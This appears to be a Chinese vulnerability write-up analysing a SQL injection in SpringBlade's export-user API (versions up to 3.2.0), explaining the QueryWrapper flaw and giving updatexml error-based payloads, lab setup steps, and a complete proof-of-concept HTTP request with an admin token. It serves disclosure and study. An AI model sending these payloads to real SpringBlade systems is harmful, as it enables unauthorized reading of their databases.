SpringBlade export-user SQL 注入漏洞分析

漏洞描述

SpringBlade是一个基于Spring Cloud和Spring Boot的开发框架,旨在简化和加速微服务架构的开发过程。它提供了一系列开箱即用的功能和组件,帮助开发人员快速构建高效可靠的微服务应用。该产品/api/blade-user/export-user接口存在SQL注入。

漏洞影响版本

SpringBlade <= v3.2.0

产品项目地址

SpringBlade: SpringBlade 是一个由商业级项目升级优化而来的微服务架构,采用Spring Boot 2.7 、Spring Cloud 2021 等核心技术构建,完全遵循阿里巴巴编码规范。提供基于React和Vue的两个前端框架用于快速搭建企业级的SaaS多租户微服务平台。https://gitee.com/smallc/SpringBlade

项目源码下载

SpringBlade 发行版 - Gitee.comhttps://gitee.com/smallc/SpringBlade/releases

漏洞分析

位于包package org.springblade.modules.system.controller;下的UserController

其中有方法 exportUser

该方法引用了QueryWrapper做为sql的查询条件,其中Map<String, Object> user是我们可控的参数

QueryWrapper使得sql语句变成如下这样的形式

复制代码
SELECT * FROM user WHERE key = 'value' AND key = value AND is_deleted = 0

sql语句中where后面的数据 是我们可控的,如此我们尝试构造如下sql语句

复制代码
SELECT * FROM `blade_user` WHERE updatexml(1,concat(0x7e,user(),0x7e),1)=1;
SELECT * FROM `blade_user` WHERE 1=updatexml(1,concat(0x7e,user(),0x7e),1);
SELECT * FROM `blade_user` WHERE updatexml(1,concat(0x7e,user(),0x7e),1);

先在本地测试一下

payload可以造成sql注入

漏洞环境搭建

{本次踩的坑有点多,不想细说了}

本地项目前后端分离,下载下面链接的前后端项目

项目源码下载

SpringBlade 发行版 - Gitee.comhttps://gitee.com/smallc/SpringBlade/releases

后端 配置好mysql redis 直接启动

前端 在项目中执行两条命令直接启动

npm install //下载前端所需包

npm start // 启动前端项目

项目搭建有问题的,可以看官方参考文档

Wiki - Gitee.comhttps://gitee.com/smallc/SpringBlade/wikis/SpringBlade%E5%BC%80%E5%8F%91%E6%89%8B%E5%86%8C

漏洞复现

打开环境web 登录页面

在用户管理页面选择导出数据

burp抓包 增加sql注入payload

sql语句成功执行,漏洞复现成功。

附赠poc

GET /api/blade-user/export-user?blade-auth=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwidG9rZW5fdHlwZSI6ImFjY2Vzc190b2tlbiIsImRlcHRfaWQiOiIxMTIzNTk4ODEzNzM4Njc1MjAxIiwiYWNjb3VudCI6ImFkbWluIiwiY2xpZW50X2lkIjoic3dvcmQiLCJleHAiOjE3MDkxMDQyMDcsIm5iZiI6MTcwOTEwMDYwN30.-Nniy1hq-gVtymm1MFWgbAuTOjwiMMheMccrXoIeeL4hbpRqMS2Fbsmf7EiJWBwMqSPX_Us4MAPevRdZVauNEQ&account=&realName=&updatexml(1,concat(0x7e,user(),0x7e),1)=1 HTTP/1.1

Host: 192.168.116.128:1888

注意:blade-auth是必要的 ,本次测试时只要admin登录情况下这串blade-auth就是可用的 貌似生成不够随机,这也算是另一个漏洞了。

相关推荐
NOVAnet202316 分钟前
云网 + 存储一体化灾备方案解析:南凌科技 × 爱数全景云灾备技术与行业落地价值
科技·web安全·企业数字化·企业sd-wan·混合云网络
白露与泡影1 小时前
Redis 缓存实战:雪崩、穿透、击穿一次讲透
数据库·redis·缓存
赵渝强老师2 小时前
【赵渝强老师】使用Oracle可传输的表空间迁移数据
数据库·oracle
SLD_Allen3 小时前
Garak:NVIDIA开源的LLM安全“体检”工具
安全·ai
Csvn3 小时前
Day 3:LIKE 与模式匹配 — 让查询学会"模糊搜索"
后端·sql
IpdataCloud3 小时前
跨区服玩家延迟高怎么办?用IP离线库自动分配到最近服务器
数据库·tcp/ip·github·php·ip
wuqingshun3141594 小时前
MYSQL默认的事务隔离级别是什么?为什么选择这个级别?
数据库·mysql
空中湖5 小时前
电池简史(五):极限之梦与终章——锂硫、锂空气、量子电池,以及你该知道的电池投资与生活指南
数据库·程序人生
辣椒思密达5 小时前
AI出海产品本地化测试:住宅IP在模拟海外用户环境中的实践价值
网络协议·tcp/ip·安全·php·苹果vision pro
蓝胖子酱6 小时前
在 Electron 中用 electron-store 实现加密存储与自定义格式文件
前端·javascript·数据库